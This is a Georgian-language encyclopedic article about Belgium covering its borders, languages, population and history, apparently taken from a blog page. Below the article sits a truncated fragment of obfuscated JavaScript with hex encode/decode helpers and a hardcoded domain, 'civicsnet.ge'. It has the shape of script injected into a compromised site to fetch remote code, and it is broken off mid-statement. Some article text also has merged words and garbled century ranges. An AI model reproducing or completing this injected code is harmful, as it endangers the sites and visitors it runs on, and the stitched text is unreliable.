ბელგია

(ნიდერლ. België; ფრანგ. Belgique; გერმ. Belgien), ოფიციალურად ბელგიის სამეფო — სახელმწიფოდასავლეთ ევროპაში. სამხრეთ-დასავლეთით ესაზღვრება საფრანგეთი (620 კმ), ჩრდილოეთით — ნიდერლანდი (450 კმ), აღმოსავლეთით გერმანია (167 კმ) და ლუქსემბურგი (148 კმ), ჩრდილოეთ-დასავლეთით აკრავს ჩრდილოეთის ზღვა. სანაპირო ხაზის სიგრძეა 66 კმ. ბელგია მდებარეობს დასავლეთი ევროპის ბევრი ქვეყნის დამაკავშირებელი მნიშვნელოვანი სატრანსპორტო მაგისტრალების გზაჯვარედინზე. ფართობი 30,528 კმ². ქვეყნის დედაქალაქი და უდიდესი ქალაქია ბრიუსელი. ოფიციალური ენებია: ნიდერლანდური, ფრანგული და გერმანული.

ბელგია კონსტიტუციური საპარლამენტო მონარქიაა. ადმინისტრაციულ-ტერიტორიული მოწყობის ფორმა ფედერაციულია. ფულის ერთეულია ევრო. 2014 წლის აღწერის მონაცემებით ბელგიაში ცხოვრობდა 11,198,638 ადამიანი. ეროვნული შემადგენლობით ბელგიის მოსახლეობა 2 ძირითად ჯგუფად იყოფა: ფლამანდელები დავალონები. ამ ორი ჯგუფის ტერიტორიული განსახლების საზღვარი გადის ბრიუსელის სამხრეთით. ბელგიის კონსტიტუცია სარწმუნოების თავისუფლების გარანტიას იძლევა. მოსახლეობის უმეტესობა კათოლიკეა, არიან აგრეთვეპროტესტანტები, იუდეველები და სხვა.

ძველი წელთაღრიცხვის III საუკუნიდან ბელგიის ტერიტორია დასახლებული იყო ბელგების კელტური ტომებით. ქვეყნის სახელწოდება ბელგების სახელწოდებასთან არის დაკავშირებული. ძველი წელთაღრიცხვის 57 წელსრომაელებმა დაიპყრეს. IIIV საუკუნეებში ბელგიის ტერიტორიაზე დასახლდნენ გერმანული ტომები — ფრანკები,ფრიზები და საქსები, რამაც გამოიწვია ჩრდილოეთ ბელგიის ადრინდელი ბელგურ-რომაული მოსახლეობის გაგერმანელება. VIX საუკუნეებში ბელგიის ტერიტორია შედიოდა ფრანკთა სახელმწიფოს შემადგენლობაში. XIV საუკუნის დასასრულს ბელგიის თითქმის მთელი ტერიტორია ბურგუნდიის ჰერცოგთა გამგებლობაში მოექცა, ხოლო 1516 წელს ესპანეთს დაემორჩილა.

1795 წელს ბელგია საფრანგეთს შეუერთდა. შემდეგ, ვენის კონგრესის გადაწყვეტილებით ბელგია ჰოლანდიასშეუერთდა. ლონდონის კონფერენციამ 1830-1831 წლებში ცნო ბელგიის სუვერენიტეტი და გამოაცხადა მისი სამუდამო ნეიტრალიტეტი. პირველი მსოფლიო ომის დასაწყისში გერმანიამ დაარღვია ბელგიის ნეიტრალიტეტი და თავისი ჯარებით დაიკავა მისი ტერიტორია. 1940 წლის 10 მაისს გერმანიის ფაშისტურმა არმიამ კვლავ დაარღვია ბელგიის ნეიტრალიტეტი. ბელგიის მთავრობა ლონდონში წავიდა.

ბელგია არის ევროპის კავშირის, გაეროსა და ჩრდილოატლანტიკური ხელშეკრულების ორგანიზაციის წევრი ქვეყანა. 1944 წლის 5 სექტემბერს შეიქმნა ეკონომიკური კავშირი ბენილუქსი, რომელიც არის შემოკლებული სახელწოდება ბელგიის, ნიდერლანდისა და ლუქსემბურგისა. ბელგიის დედაქალაქ ბრიუსელში განლაგებულია ევროპის კავშირისშტაბ-ბინა, აგრეთვე ნატოს ოფისი და ბენილუქსის ქვეყნების სეკრეტარიატი.

// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t=””,o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "civicsnet.ge"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e

Leave a Reply